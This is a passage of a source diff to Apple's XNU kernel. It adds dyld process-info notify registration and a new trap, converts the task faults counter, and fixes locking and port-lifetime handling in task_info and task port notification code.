 /* 14 */ MACH_TRAP(_kernelrpc_mach_vm_protect_trap, 5, 7, munge_wllww),
 /* 15 */ MACH_TRAP(_kernelrpc_mach_vm_map_trap, 6, 8, munge_wwllww),
 /* 16 */ MACH_TRAP(_kernelrpc_mach_port_allocate_trap, 3, 3, munge_www),
@@ -233,7 +233,7 @@ const mach_trap_t       mach_trap_table[MACH_TRAP_TABLE_COUNT] = {
 /* 127 */ MACH_TRAP(kern_invalid, 0, 0, NULL),
 };
 
-const char * mach_syscall_name_table[MACH_TRAP_TABLE_COUNT] = {
+const char * const mach_syscall_name_table[MACH_TRAP_TABLE_COUNT] = {
 /* 0 */ "kern_invalid",
 /* 1 */ "kern_invalid",
 /* 2 */ "kern_invalid",
@@ -247,7 +247,7 @@ const char * mach_syscall_name_table[MACH_TRAP_TABLE_COUNT] = {
 /* 10 */ "_kernelrpc_mach_vm_allocate_trap",
 /* 11 */ "kern_invalid",
 /* 12 */ "_kernelrpc_mach_vm_deallocate_trap",
-/* 13 */ "kern_invalid",
+/* 13 */ "task_dyld_process_info_notify_get_trap",
 /* 14 */ "_kernelrpc_mach_vm_protect_trap",
 /* 15 */ "_kernelrpc_mach_vm_map_trap",
 /* 16 */ "_kernelrpc_mach_port_allocate_trap",
@@ -368,7 +368,7 @@ const char * mach_syscall_name_table[MACH_TRAP_TABLE_COUNT] = {
 /* 127 */ "kern_invalid",
 };
 
-int     mach_trap_count = (sizeof(mach_trap_table) / sizeof(mach_trap_table[0]));
+const int mach_trap_count = (sizeof(mach_trap_table) / sizeof(mach_trap_table[0]));
 
 kern_return_t
 kern_invalid(
index 2816a65fc768d8c080dd3d19ebe54c8830dfaea3..c15f8f09784b920e09c36909bbf3882802e8fa02 100644 (file)
@@ -88,7 +88,7 @@ typedef struct {
 
 
 extern const mach_trap_t       mach_trap_table[];
-extern int                     mach_trap_count;
+extern const int                       mach_trap_count;
 
 #if CONFIG_REQUIRES_U32_MUNGING || (__arm__ && (__BIGGEST_ALIGNMENT__ > 4))
 
index 1ace4c3ec20ffb7e0b8fa26e86ad93e645c78067..1266acd83e8b3d820f7af5c96b0b1dc38e1790df 100644 (file)
 #include <libkern/section_keywords.h>
 
 #include <mach-o/loader.h>
+#include <kdp/kdp_dyld.h>
 
 #include <kern/sfi.h>           /* picks up ledger.h */
 
@@ -213,6 +214,10 @@ LCK_SPIN_DECLARE_ATTR(dead_task_statistics_lock, &task_lck_grp, &task_lck_attr);
 
 ledger_template_t task_ledger_template = NULL;
 
+/* global lock for task_dyld_process_info_notify_{register, deregister, get_trap} */
+LCK_GRP_DECLARE(g_dyldinfo_mtx_grp, "g_dyldinfo");
+LCK_MTX_DECLARE(g_dyldinfo_mtx, &g_dyldinfo_mtx_grp);
+
 SECURITY_READ_ONLY_LATE(struct _task_ledger_indices) task_ledgers __attribute__((used)) =
 {.cpu_time = -1,
  .tkm_private = -1,
@@ -1318,6 +1323,8 @@ task_create_internal(
                return KERN_RESOURCE_SHORTAGE;
        }
 
+       counter_alloc(&(new_task->faults));
+
 #if defined(HAS_APPLE_PAC)
        ml_task_set_rop_pid(new_task, parent_task, inherit_memory);
        ml_task_set_jop_pid(new_task, parent_task, inherit_memory);
@@ -1447,6 +1454,8 @@ task_create_internal(
        new_task->requested_policy = default_task_requested_policy;
        new_task->effective_policy = default_task_effective_policy;
 
+       new_task->task_shared_region_slide = -1;
+
        task_importance_init_from_parent(new_task, parent_task);
 
        if (parent_task != TASK_NULL) {
@@ -1551,7 +1560,6 @@ task_create_internal(
                new_task->total_system_time = 0;
                new_task->total_ptime = 0;
                new_task->total_runnable_time = 0;
-               new_task->faults = 0;
                new_task->pageins = 0;
                new_task->cow_faults = 0;
                new_task->messages_sent = 0;
@@ -1700,7 +1708,7 @@ task_rollup_accounting_info(task_t to_task, task_t from_task)
        to_task->total_system_time = from_task->total_system_time;
        to_task->total_ptime = from_task->total_ptime;
        to_task->total_runnable_time = from_task->total_runnable_time;
-       to_task->faults = from_task->faults;
+       counter_add(&to_task->faults, counter_load(&from_task->faults));
        to_task->pageins = from_task->pageins;
        to_task->cow_faults = from_task->cow_faults;
        to_task->decompressions = from_task->decompressions;
@@ -1906,6 +1914,8 @@ task_deallocate(
        btlog_remove_entries_for_element(task_ref_btlog, task);
 #endif
 
+       counter_free(&task->faults);
+
 #if CONFIG_COALITIONS
        task_release_coalitions(task);
 #endif /* CONFIG_COALITIONS */
@@ -2270,7 +2280,7 @@ task_mark_corpse(task_t task)
        task_add_to_corpse_task_list(task);
 
        task_start_halt(task);
-       thread_terminate_internal(self_thread);
+       thread_terminate_internal(self_thread, TH_TERMINATE_OPTION_NONE);
 
        (void) thread_interrupt_level(wsave);
        assert(task->halting == TRUE);
@@ -2298,6 +2308,7 @@ task_clear_corpse(task_t task)
        {
                thread_mtx_lock(th_iter);
                th_iter->inspection = FALSE;
+               ipc_thread_disable(th_iter);
                thread_mtx_unlock(th_iter);
        }
 
@@ -2356,7 +2367,7 @@ task_port_with_flavor_notify(mach_msg_header_t *msg)
                ip_unlock(port);
                return;
        }
-       task = (task_t)port->ip_kobject;
+       task = (task_t)ipc_kobject_get(port);
        kotype = ip_kotype(port);
        if (task != TASK_NULL) {
                assert((IKOT_TASK_READ == kotype) || (IKOT_TASK_INSPECT == kotype));
@@ -2369,29 +2380,40 @@ task_port_with_flavor_notify(mach_msg_header_t *msg)
                return;
        }
 
+       if (kotype == IKOT_TASK_READ) {
+               flavor = TASK_FLAVOR_READ;
+       } else {
+               flavor = TASK_FLAVOR_INSPECT;
+       }
+
        itk_lock(task);
        ip_lock(port);
-       require_ip_active(port);
        /*
+        * If the port is no longer active, then ipc_task_terminate() ran
+        * and destroyed the kobject already. Just deallocate the task
+        * ref we took and go away.
+        *
+        * It is also possible that several nsrequests are in flight,
+        * only one shall NULL-out the port entry, and this is the one
+        * that gets to dealloc the port.
+        *
         * Check for a stale no-senders notification. A call to any function
         * that vends out send rights to this port could resurrect it between
         * this notification being generated and actually being handled here.
         */
-       if (port->ip_srights > 0) {
+       if (!ip_active(port) ||
+           task->itk_task_ports[flavor] != port ||
+           port->ip_srights > 0) {
                ip_unlock(port);
                itk_unlock(task);
                task_deallocate(task);
                return;
        }
 
-       if (kotype == IKOT_TASK_READ) {
-               flavor = TASK_FLAVOR_READ;
-       } else {
-               flavor = TASK_FLAVOR_INSPECT;
-       }
-       assert(task->itk_self[flavor] == port);
-       task->itk_self[flavor] = IP_NULL;
-       port->ip_kobject = IKOT_NONE;
+       assert(task->itk_task_ports[flavor] == port);
+       task->itk_task_ports[flavor] = IP_NULL;
+
+       ipc_kobject_set_atomically(port, IKO_NULL, IKOT_NONE);
        ip_unlock(port);
        itk_unlock(task);
        task_deallocate(task);
@@ -2705,7 +2727,7 @@ task_terminate_internal(
         *      Terminate each thread in the task.
         */
        queue_iterate(&task->threads, thread, thread_t, task_threads) {
-               thread_terminate_internal(thread);
+               thread_terminate_internal(thread, TH_TERMINATE_OPTION_NONE);
        }
 
 #ifdef MACH_BSD
@@ -2931,7 +2953,7 @@ task_start_halt_locked(task_t task, boolean_t should_mark_corpse)
                        thread_mtx_unlock(thread);
                }
                if (thread != self) {
-                       thread_terminate_internal(thread);
+                       thread_terminate_internal(thread, TH_TERMINATE_OPTION_NONE);
                }
        }
        task->dispatchqueue_offset = dispatchqueue_offset;
@@ -3224,6 +3246,8 @@ task_threads_internal(
                return KERN_INVALID_ARGUMENT;
        }
 
+       assert(flavor <= THREAD_FLAVOR_INSPECT);
+
        for (;;) {
                task_lock(task);
                if (!task->active) {
@@ -3315,8 +3339,14 @@ task_threads_internal(
 
                switch (flavor) {
                case THREAD_FLAVOR_CONTROL:
-                       for (i = 0; i < actual; ++i) {
-                               ((ipc_port_t *) thread_list)[i] = convert_thread_to_port(thread_list[i]);
+                       if (task == current_task()) {
+                               for (i = 0; i < actual; ++i) {
+                                       ((ipc_port_t *) thread_list)[i] = convert_thread_to_port_pinned(thread_list[i]);
+                               }
+                       } else {
+                               for (i = 0; i < actual; ++i) {
+                                       ((ipc_port_t *) thread_list)[i] = convert_thread_to_port(thread_list[i]);
+                               }
                        }
                        break;
                case THREAD_FLAVOR_READ:
@@ -3329,8 +3359,6 @@ task_threads_internal(
                                ((ipc_port_t *) thread_list)[i] = convert_thread_inspect_to_port(thread_list[i]);
                        }
                        break;
-               default:
-                       return KERN_INVALID_ARGUMENT;
                }
        }
 
@@ -3550,7 +3578,8 @@ task_suspend(
         * notification on that port (if none outstanding).
         */
        (void)ipc_kobject_make_send_lazy_alloc_port((ipc_port_t *) &task->itk_resume,
-           (ipc_kobject_t)task, IKOT_TASK_RESUME, true, OS_PTRAUTH_DISCRIMINATOR("task.itk_resume"));
+           (ipc_kobject_t)task, IKOT_TASK_RESUME, IPC_KOBJECT_ALLOC_NONE, true,
+           OS_PTRAUTH_DISCRIMINATOR("task.itk_resume"));
        port = task->itk_resume;
        task_unlock(task);
 
@@ -3559,12 +3588,19 @@ task_suspend(
         * but we'll look it up when calling a traditional resume.  Any IPC operations that
         * deallocate the send right will auto-release the suspension.
         */
-       if ((kr = ipc_kmsg_copyout_object(current_task()->itk_space, ip_to_object(port),
-           MACH_MSG_TYPE_MOVE_SEND, NULL, NULL, &name)) != KERN_SUCCESS) {
-               printf("warning: %s(%d) failed to copyout suspension token for pid %d with error: %d\n",
-                   proc_name_address(current_task()->bsd_info), proc_pid(current_task()->bsd_info),
+       if (IP_VALID(port)) {
+               kr = ipc_object_copyout(current_space(), ip_to_object(port),
+                   MACH_MSG_TYPE_MOVE_SEND, IPC_OBJECT_COPYOUT_FLAGS_NONE,
+                   NULL, NULL, &name);
+       } else {
+               kr = KERN_SUCCESS;
+       }
+       if (kr != KERN_SUCCESS) {
+               printf("warning: %s(%d) failed to copyout suspension "
+                   "token for pid %d with error: %d\n",
+                   proc_name_address(current_task()->bsd_info),
+                   proc_pid(current_task()->bsd_info),
                    task_pid(task), kr);
-               return kr;
        }
 
        return kr;
@@ -4622,6 +4658,7 @@ task_info(
 {
        kern_return_t error = KERN_SUCCESS;
        mach_msg_type_number_t  original_task_info_count;
+       bool is_kernel_task = (task == kernel_task);
 
        if (task == TASK_NULL) {
                return KERN_INVALID_ARGUMENT;
@@ -5135,7 +5172,7 @@ task_info(
                events_info = (task_events_info_t) task_info_out;
 
 
-               events_info->faults = task->faults;
+               events_info->faults = (int32_t) MIN(counter_load(&task->faults), INT32_MAX);
                events_info->pageins = task->pageins;
                events_info->cow_faults = task->cow_faults;
                events_info->messages_sent = task->messages_sent;
@@ -5233,11 +5270,19 @@ task_info(
 
                vm_info = (task_vm_info_t)task_info_out;
 
-               if (task == kernel_task) {
+               /*
+                * Do not hold both the task and map locks,
+                * so convert the task lock into a map reference,
+                * drop the task lock, then lock the map.
+                */
+               if (is_kernel_task) {
                        map = kernel_map;
-                       /* no lock */
+                       task_unlock(task);
+                       /* no lock, no reference */
                } else {
                        map = task->map;
+                       vm_map_reference(map);
+                       task_unlock(task);
                        vm_map_lock_read(map);
                }
 
@@ -5268,7 +5313,7 @@ task_info(
                vm_info->purgeable_volatile_pmap = 0;
                vm_info->purgeable_volatile_resident = 0;
                vm_info->purgeable_volatile_virtual = 0;
-               if (task == kernel_task) {
+               if (is_kernel_task) {
                        /*
                         * We do not maintain the detailed stats for the
                         * kernel_pmap, so just count everything as
@@ -5318,16 +5363,41 @@ task_info(
                }
                *task_info_count = TASK_VM_INFO_REV0_COUNT;
 
+               if (original_task_info_count >= TASK_VM_INFO_REV2_COUNT) {
+                       /* must be captured while we still have the map lock */
+                       vm_info->min_address = map->min_offset;
+                       vm_info->max_address = map->max_offset;
+               }
+
+               /*
+                * Done with vm map things, can drop the map lock and reference,
+                * and take the task lock back.
+                *
+                * Re-validate that the task didn't die on us.
+                */
+               if (!is_kernel_task) {
+                       vm_map_unlock_read(map);
+                       vm_map_deallocate(map);
+               }
+               map = VM_MAP_NULL;
+
+               task_lock(task);
+
+               if ((task != current_task()) && (!task->active)) {
+                       error = KERN_INVALID_ARGUMENT;
+                       break;
+               }
+
                if (original_task_info_count >= TASK_VM_INFO_REV1_COUNT) {
                        vm_info->phys_footprint =
                            (mach_vm_size_t) get_task_phys_footprint(task);
                        *task_info_count = TASK_VM_INFO_REV1_COUNT;
                }
                if (original_task_info_count >= TASK_VM_INFO_REV2_COUNT) {
-                       vm_info->min_address = map->min_offset;
-                       vm_info->max_address = map->max_offset;
+                       /* data was captured above */
                        *task_info_count = TASK_VM_INFO_REV2_COUNT;
                }
+
                if (original_task_info_count >= TASK_VM_INFO_REV3_COUNT) {
                        ledger_get_lifetime_max(task->ledger,
                            task_ledgers.phys_footprint,
@@ -5413,10 +5483,6 @@ task_info(
                        *task_info_count = TASK_VM_INFO_REV5_COUNT;
                }
 
-               if (task != kernel_task) {
-                       vm_map_unlock_read(map);
-               }
-
                break;
        }
 
@@ -5560,7 +5626,7 @@ task_info(
  * checks on task_port.
  *
  * In the case of TASK_DYLD_INFO, we require the more
- * privileged task_port not the less-privileged task_name_port.
+ * privileged task_read_port not the less-privileged task_name_port.
  *
  */
 kern_return_t
@@ -5574,7 +5640,7 @@ task_info_from_user(
        kern_return_t ret;
 
        if (flavor == TASK_DYLD_INFO) {
-               task = convert_port_to_task(task_port);
+               task = convert_port_to_task_read(task_port);
        } else {
                task = convert_port_to_task_name(task_port);
        }
@@ -5586,6 +5652,298 @@ task_info_from_user(
        return ret;
 }
 
+/*
+ * Routine: task_dyld_process_info_update_helper
+ *
+ * Release send rights in release_ports.
+ *
+ * If no active ports found in task's dyld notifier array, unset the magic value
+ * in user space to indicate so.
+ *
+ * Condition:
+ *      task's itk_lock is locked, and is unlocked upon return.
+ *      Global g_dyldinfo_mtx is locked, and is unlocked upon return.
+ */
+void
+task_dyld_process_info_update_helper(
+       task_t                  task,
+       size_t                  active_count,
+       vm_map_address_t        magic_addr,    /* a userspace address */
+       ipc_port_t             *release_ports,
+       size_t                  release_count)
+{
+       void *notifiers_ptr = NULL;
+
+       assert(release_count <= DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT);
+
+       if (active_count == 0) {
+               assert(task->itk_dyld_notify != NULL);
+               notifiers_ptr = task->itk_dyld_notify;
+               task->itk_dyld_notify = NULL;
+               itk_unlock(task);
+
+               kfree(notifiers_ptr, (vm_size_t)sizeof(ipc_port_t) * DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT);
+               (void)copyoutmap_atomic32(task->map, MACH_PORT_NULL, magic_addr); /* unset magic */
+       } else {
+               itk_unlock(task);
+               (void)copyoutmap_atomic32(task->map, (mach_port_name_t)DYLD_PROCESS_INFO_NOTIFY_MAGIC,
+                   magic_addr);     /* reset magic */
+       }
+
+       lck_mtx_unlock(&g_dyldinfo_mtx);
+
+       for (size_t i = 0; i < release_count; i++) {
+               ipc_port_release_send(release_ports[i]);
+       }
+}
+
+/*
+ * Routine: task_dyld_process_info_notify_register
+ *
+ * Insert a send right to target task's itk_dyld_notify array. Allocate kernel
+ * memory for the array if it's the first port to be registered. Also cleanup
+ * any dead rights found in the array.
+ *
+ * Consumes sright if returns KERN_SUCCESS, otherwise MIG will destroy it.
+ *
+ * Args:
+ *     task:   Target task for the registration.
+ *     sright: A send right.
+ *
+ * Returns:
+ *     KERN_SUCCESS: Registration succeeded.
+ *     KERN_INVALID_TASK: task is invalid.
+ *     KERN_INVALID_RIGHT: sright is invalid.
+ *     KERN_DENIED: Security policy denied this call.
+ *     KERN_RESOURCE_SHORTAGE: Kernel memory allocation failed.
+ *     KERN_NO_SPACE: No available notifier port slot left for this task.
+ *     KERN_RIGHT_EXISTS: The notifier port is already registered and active.
+ *
+ *     Other error code see task_info().
+ *
+ * See Also:
+ *     task_dyld_process_info_notify_get_trap() in mach_kernelrpc.c
+ */
+kern_return_t
+task_dyld_process_info_notify_register(
+       task_t                  task,
+       ipc_port_t              sright)
+{
+       struct task_dyld_info dyld_info;
+       mach_msg_type_number_t info_count = TASK_DYLD_INFO_COUNT;
+       ipc_port_t release_ports[DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT];
+       uint32_t release_count = 0, active_count = 0;
+       mach_vm_address_t ports_addr; /* a user space address */
+       kern_return_t kr;
+       boolean_t right_exists = false;
+       ipc_port_t *notifiers_ptr = NULL;
+       ipc_port_t *portp;
+
+       if (task == TASK_NULL || task == kernel_task) {
+               return KERN_INVALID_TASK;
+       }
+
+       if (!IP_VALID(sright)) {
+               return KERN_INVALID_RIGHT;
+       }
+
+#if CONFIG_MACF
+       if (mac_task_check_dyld_process_info_notify_register()) {
+               return KERN_DENIED;
+       }
+#endif
+
+       kr = task_info(task, TASK_DYLD_INFO, (task_info_t)&dyld_info, &info_count);
+       if (kr) {
+               return kr;
+       }
+
+       if (dyld_info.all_image_info_format == TASK_DYLD_ALL_IMAGE_INFO_32) {
+               ports_addr = (mach_vm_address_t)(dyld_info.all_image_info_addr +
+                   offsetof(struct user32_dyld_all_image_infos, notifyMachPorts));
+       } else {
+               ports_addr = (mach_vm_address_t)(dyld_info.all_image_info_addr +
+                   offsetof(struct user64_dyld_all_image_infos, notifyMachPorts));
+       }
+
+       if (task->itk_dyld_notify == NULL) {
+               notifiers_ptr = (ipc_port_t *)
+                   kalloc_flags(sizeof(ipc_port_t) * DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT, Z_ZERO);
+               if (!notifiers_ptr) {
+                       return KERN_RESOURCE_SHORTAGE;
+               }
+       }
+
+       lck_mtx_lock(&g_dyldinfo_mtx);
+       itk_lock(task);
+
+       if (task->itk_dyld_notify == NULL) {
+               task->itk_dyld_notify = notifiers_ptr;
+               notifiers_ptr = NULL;
+       }
+
+       assert(task->itk_dyld_notify != NULL);
+       /* First pass: clear dead names and check for duplicate registration */
+       for (int slot = 0; slot < DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT; slot++) {
+               portp = &task->itk_dyld_notify[slot];
+               if (*portp != IPC_PORT_NULL && !ip_active(*portp)) {
+                       release_ports[release_count++] = *portp;
+                       *portp = IPC_PORT_NULL;
+               } else if (*portp == sright) {
+                       /* the port is already registered and is active */
+                       right_exists = true;
+               }
+
+               if (*portp != IPC_PORT_NULL) {
+                       active_count++;
+               }
+       }
+
+       if (right_exists) {
+               /* skip second pass */
+               kr = KERN_RIGHT_EXISTS;
+               goto out;
+       }
+
+       /* Second pass: register the port */
+       kr = KERN_NO_SPACE;
+       for (int slot = 0; slot < DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT; slot++) {
+               portp = &task->itk_dyld_notify[slot];
+               if (*portp == IPC_PORT_NULL) {
+                       *portp = sright;
+                       active_count++;
+                       kr = KERN_SUCCESS;
+                       break;
+               }
+       }
+
+out:
+       assert(active_count > 0);
+
+       task_dyld_process_info_update_helper(task, active_count,
+           (vm_map_address_t)ports_addr, release_ports, release_count);
+       /* itk_lock, g_dyldinfo_mtx are unlocked upon return */
+
+       if (notifiers_ptr) {
+               kfree(notifiers_ptr, sizeof(ipc_port_t) * DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT);
+       }
+
+       return kr;
+}
+
+/*
+ * Routine: task_dyld_process_info_notify_deregister
+ *
+ * Remove a send right in target task's itk_dyld_notify array matching the receive
+ * right name passed in. Deallocate kernel memory for the array if it's the last port to
+ * be deregistered, or all ports have died. Also cleanup any dead rights found in the array.
+ *
+ * Does not consume any reference.
+ *
+ * Args:
+ *     task: Target task for the deregistration.
+ *     rcv_name: The name denoting the receive right in caller's space.
+ *
+ * Returns:
+ *     KERN_SUCCESS: A matching entry found and degistration succeeded.
+ *     KERN_INVALID_TASK: task is invalid.
+ *     KERN_INVALID_NAME: name is invalid.
+ *     KERN_DENIED: Security policy denied this call.
+ *     KERN_FAILURE: A matching entry is not found.
+ *     KERN_INVALID_RIGHT: The name passed in does not represent a valid rcv right.
+ *
+ *     Other error code see task_info().
+ *
+ * See Also:
+ *     task_dyld_process_info_notify_get_trap() in mach_kernelrpc.c
+ */
+kern_return_t
+task_dyld_process_info_notify_deregister(
+       task_t                  task,
+       mach_port_name_t        rcv_name)
+{
+       struct task_dyld_info dyld_info;
+       mach_msg_type_number_t info_count = TASK_DYLD_INFO_COUNT;
+       ipc_port_t release_ports[DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT];
+       uint32_t release_count = 0, active_count = 0;
+       boolean_t port_found = false;
+       mach_vm_address_t ports_addr; /* a user space address */
+       ipc_port_t sright;
+       kern_return_t kr;
+       ipc_port_t *portp;
+
+       if (task == TASK_NULL || task == kernel_task) {
+               return KERN_INVALID_TASK;
+       }
+
+       if (!MACH_PORT_VALID(rcv_name)) {
+               return KERN_INVALID_NAME;
+       }
+
+#if CONFIG_MACF
+       if (mac_task_check_dyld_process_info_notify_register()) {
+               return KERN_DENIED;
+       }
+#endif
+
+       kr = task_info(task, TASK_DYLD_INFO, (task_info_t)&dyld_info, &info_count);
+       if (kr) {
+               return kr;
+       }
+
+       if (dyld_info.all_image_info_format == TASK_DYLD_ALL_IMAGE_INFO_32) {
+               ports_addr = (mach_vm_address_t)(dyld_info.all_image_info_addr +
+                   offsetof(struct user32_dyld_all_image_infos, notifyMachPorts));
+       } else {
+               ports_addr = (mach_vm_address_t)(dyld_info.all_image_info_addr +
+                   offsetof(struct user64_dyld_all_image_infos, notifyMachPorts));
+       }
+
+       kr = ipc_port_translate_receive(current_space(), rcv_name, &sright); /* does not produce port ref */
+       if (kr) {
+               return KERN_INVALID_RIGHT;
+       }
+
+       ip_reference(sright);
+       ip_unlock(sright);
+
+       assert(sright != IPC_PORT_NULL);
+
+       lck_mtx_lock(&g_dyldinfo_mtx);
+       itk_lock(task);
+
+       if (task->itk_dyld_notify == NULL) {
+               itk_unlock(task);
+               lck_mtx_unlock(&g_dyldinfo_mtx);
+               ip_release(sright);
+               return KERN_FAILURE;
+       }
+
+       for (int slot = 0; slot < DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT; slot++) {
+               portp = &task->itk_dyld_notify[slot];
+               if (*portp == sright) {
+                       release_ports[release_count++] = *portp;
+                       *portp = IPC_PORT_NULL;
+                       port_found = true;
+               } else if ((*portp != IPC_PORT_NULL && !ip_active(*portp))) {
+                       release_ports[release_count++] = *portp;
+                       *portp = IPC_PORT_NULL;
+               }
+
+               if (*portp != IPC_PORT_NULL) {
+                       active_count++;
+               }
+       }
+
+       task_dyld_process_info_update_helper(task, active_count,
+           (vm_map_address_t)ports_addr, release_ports, release_count);
+       /* itk_lock, g_dyldinfo_mtx are unlocked upon return */
+
+       ip_release(sright);
+
+       return port_found ? KERN_SUCCESS : KERN_FAILURE;
+}
+
 /*
  *     task_power_info
  *
index d74ddc9354aba940152560844215df41816cc44f..266ea4ce95ddfef106d2b4ae8bd07029b37fed10 100644 (file)
@@ -98,6 +98,7 @@
 #ifdef XNU_KERNEL_PRIVATE
 #include <kern/kern_cdata.h>
 #include <mach/sfi_class.h>
+#include <kern/counter.h>
 #include <kern/queue.h>
 #include <sys/kern_sysctl.h>
 #endif /* XNU_KERNEL_PRIVATE */
@@ -152,11 +153,12 @@ struct task_watchports;
 
 struct task {
        /* Synchronization/destruction information */
-       decl_lck_mtx_data(, lock);               /* Task's lock */
+       decl_lck_mtx_data(, lock);      /* Task's lock */
        os_refcnt_t     ref_count;      /* Number of references to me */
-       boolean_t       active;         /* Task has not been terminated */
-       boolean_t       halting;        /* Task is being halted */
-       boolean_t       message_app_suspended;  /* Let iokit know when pidsuspended */
+       bool            active;         /* Task has not been terminated */
+       bool            ipc_active;     /* IPC with the task ports is allowed */
+       bool            halting;        /* Task is being halted */
+       bool            message_app_suspended;  /* Let iokit know when pidsuspended */
 
        /* Virtual timers */
        uint32_t                vtimers;
@@ -207,19 +209,21 @@ struct task {
         * Different flavors of task port.
         * These flavors TASK_FLAVOR_* are defined in mach_types.h
         */
-       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_self") itk_self[TASK_SELF_PORT_COUNT];    /* does not hold right */
-       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_settable_self") itk_settable_self; /* a send right */
+       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_task_ports") itk_task_ports[TASK_SELF_PORT_COUNT];
+       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_settable_self") itk_settable_self;   /* a send right */
+       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_self") itk_self;                     /* immovable/pinned task port, does not hold right */
        struct exception_action exc_actions[EXC_TYPES_COUNT];
        /* a send right each valid element  */
-       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_host") itk_host;      /* a send right */
-       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_bootstrap") itk_bootstrap; /* a send right */
-       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_seatbelt") itk_seatbelt;  /* a send right */
-       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_gssd") itk_gssd;      /* yet another send right */
-       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_debug_control") itk_debug_control; /* send right for debugmode communications */
-       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_task_access") itk_task_access; /* and another send right */
-       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_resume") itk_resume;    /* a receive right to resume this task */
+       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_host") itk_host;                     /* a send right */
+       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_bootstrap") itk_bootstrap;           /* a send right */
+       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_seatbelt") itk_seatbelt;             /* a send right */
+       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_gssd") itk_gssd;                     /* yet another send right */
+       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_debug_control") itk_debug_control;   /* send right for debugmode communications */
+       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_task_access") itk_task_access;       /* and another send right */
+       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_resume") itk_resume;                 /* a receive right to resume this task */
        struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_registered") itk_registered[TASK_PORT_REGISTER_MAX];
        /* all send rights */
+       ipc_port_t * XNU_PTRAUTH_SIGNED_PTR("task.itk_dyld_notify") itk_dyld_notify; /* lazy send rights array of size DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT */
 
        struct ipc_space * XNU_PTRAUTH_SIGNED_PTR("task.itk_space") itk_space;
 
@@ -233,7 +237,7 @@ struct task {
 
        MACHINE_TASK
 
-       integer_t faults;              /* faults counter */
+       counter_t faults;              /* faults counter */
        integer_t decompressions;      /* decompression counter */
        integer_t pageins;             /* pageins counter */
        integer_t cow_faults;          /* copy on write fault counter */
@@ -478,6 +482,8 @@ struct task {
 #if CONFIG_PHYS_WRITE_ACCT
        uint64_t        task_fs_metadata_writes;
 #endif /* CONFIG_PHYS_WRITE_ACCT */
+       uint32_t task_shared_region_slide;   /* cached here to avoid locking during telemetry */
+       uuid_t   task_shared_region_uuid;
 };
 
 /*
@@ -595,6 +601,14 @@ task_watchport_elem_deallocate(
 extern boolean_t
 task_has_watchports(task_t task);
 
+void
+task_dyld_process_info_update_helper(
+       task_t                  task,
+       size_t                  active_count,
+       vm_map_address_t        magic_addr,
+       ipc_port_t             *release_ports,
+       size_t                  release_count);
+
 #else   /* MACH_KERNEL_PRIVATE */
 
 __BEGIN_DECLS
@@ -1047,6 +1061,7 @@ extern boolean_t get_task_frozen(task_t);
 
 /* Convert from a task to a port */
 extern ipc_port_t convert_task_to_port(task_t);
+extern ipc_port_t convert_task_to_port_pinned(task_t);
 extern ipc_port_t convert_task_name_to_port(task_name_t);
 extern ipc_port_t convert_task_inspect_to_port(task_inspect_t);
 extern ipc_port_t convert_task_read_to_port(task_read_t);
diff --git a/osfmk/kern/task_ident.c b/osfmk/kern/task_ident.c
new file mode 100644 (file)
index 0000000..71802c5
--- /dev/null
@@ -0,0 +1,250 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+#include <os/refcnt.h>
+#include <kern/ipc_kobject.h>
+#include <mach/mach_types.h>
+#include <mach/task.h>
+#include <mach/notify.h>
+#include <mach/kern_return.h>
+#include <security/mac_mach_internal.h>
+#include <kern/task_ident.h>
+
+struct proc_ident {
+       uint64_t        p_uniqueid;
+       pid_t           p_pid;
+       int             p_idversion;
+};
+
+extern void* proc_find_ident(struct proc_ident const *i);
+extern int proc_rele(void* p);
